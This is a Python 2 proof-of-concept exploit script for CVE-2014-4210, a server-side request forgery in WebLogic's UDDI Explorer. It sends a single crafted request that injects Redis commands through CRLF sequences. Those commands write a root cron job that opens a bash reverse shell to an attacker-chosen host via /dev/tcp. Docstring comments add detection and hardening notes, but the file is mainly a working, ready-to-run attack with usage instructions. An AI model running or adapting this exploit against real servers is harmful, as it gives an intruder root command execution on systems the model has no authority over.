cve-2014-4210_ssrf_redis_shell.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
import time
def shell(weblogic_ip,weblogic_port,inside_ip,inside_port,nc_ip,nc_port):
    """Send one crafted GET to WebLogic's UDDI Explorer search page (CVE-2014-4210 PoC).

    The ``operator`` query parameter of ``SearchPublicRegistries.jsp`` is set
    to a URL on ``inside_ip:inside_port``. Percent-encoded CRLF pairs
    (``%0D%0A``) and plain-text Redis commands follow that URL. The commands
    visible in the string are: ``set`` key ``1`` to a newline-padded cron
    line, ``config set dir /etc/``, ``config set dbfilename crontab`` and
    ``save``. The cron line starts an interactive bash as root connected to
    ``nc_ip:nc_port``.

    The chain presumably depends on three conditions outside this script:
    WebLogic fetching the ``operator`` URL server-side with the CRLFs intact,
    the internal Redis accepting unauthenticated commands, and the Redis
    process being allowed to write under ``/etc``. Removing any one of them
    should break it.

    Detection and hardening points that follow from the request itself:
      * Web or proxy logs: requests to ``/uddiexplorer/SearchPublicRegistries.jsp``
        whose ``operator`` value contains ``%0D%0A`` or names an internal
        host and port.
      * Redis: ``CONFIG SET dir`` / ``CONFIG SET dbfilename`` followed by
        ``SAVE``; unexpected changes to ``/etc/crontab`` on the Redis host.
      * Apply the vendor fix for CVE-2014-4210 and undeploy or
        access-restrict ``uddiexplorer`` where it is not needed.
      * Limit outbound connections from the WebLogic host to internal services.
      * Run Redis unprivileged with ``requirepass`` set, and disable or
        rename ``CONFIG`` via ``rename-command``.

    Args:
        weblogic_ip: Host of the WebLogic server that receives the request.
        weblogic_port: Port of that WebLogic server.
        inside_ip: Address placed in the ``operator`` URL (the Redis host in
            the usage example).
        inside_port: Port placed in the ``operator`` URL (6379 in the usage
            example).
        nc_ip: Address written into the cron line as the connect-back host.
        nc_port: Port written into the cron line as the connect-back port.

    Returns:
        None. The result is only reported through printed messages.
    """
    # The whole request is this one pre-encoded string; only the six host/port
    # fields are substituted, and they are inserted without any validation.
    exp_url = "http://{}:{}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{}:{}/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa".format(weblogic_ip,weblogic_port,inside_ip,inside_port,nc_ip,nc_port)
    try:
        # verify=False has no effect here because the URL uses the http:// scheme.
        # The response is stored but never inspected, so the messages below do
        # not confirm that anything was written on the Redis side.
        response = requests.get(exp_url,timeout=5,verify=False)
        print "[+]please wait a monment"
        # Fixed pause only; no polling or verification follows it.
        time.sleep(3)
        print "[+]Then check you vps if or not get a rebound shell!"
    # Python 2 syntax (print statement, "except X,e"): this file does not parse
    # under Python 3. Any exception raised in the try body lands here, including
    # request timeouts and connection errors.
    except Exception,e:
        print e
        print "[-]maybe Rebound shell failed!"
if __name__ == "__main__":
    # Exactly six positional arguments are expected. Any other count prints the
    # usage banner and sends nothing.
    if len(sys.argv) == 7:
        _, weblogic_ip, weblogic_port, inside_ip, inside_port, nc_ip, nc_port = sys.argv
        # The internal port and the connect-back port are converted to int
        # here; the WebLogic port is passed through as the string given on the
        # command line.
        shell(weblogic_ip, weblogic_port, inside_ip, int(inside_port), nc_ip, int(nc_port))
    else:
        usage_lines = (
            "+---------------------------------------------------------------------------------------------------+",
            "+ USE: python <filename> <weblogic_ip> <weblogic_port> <inside_ip> <inside_port> <nc_ip> <nc_port> +",
            "+ EXP: python filename.py 1.1.1.1 7001 192.168.1.1 6379 2.2.2.2 5555 +",
            "+ VER: 10.0.2,10.3.6 +",
            "+---------------------------------------------------------------------------------------------------+",
        )
        for usage_line in usage_lines:
            print(usage_line)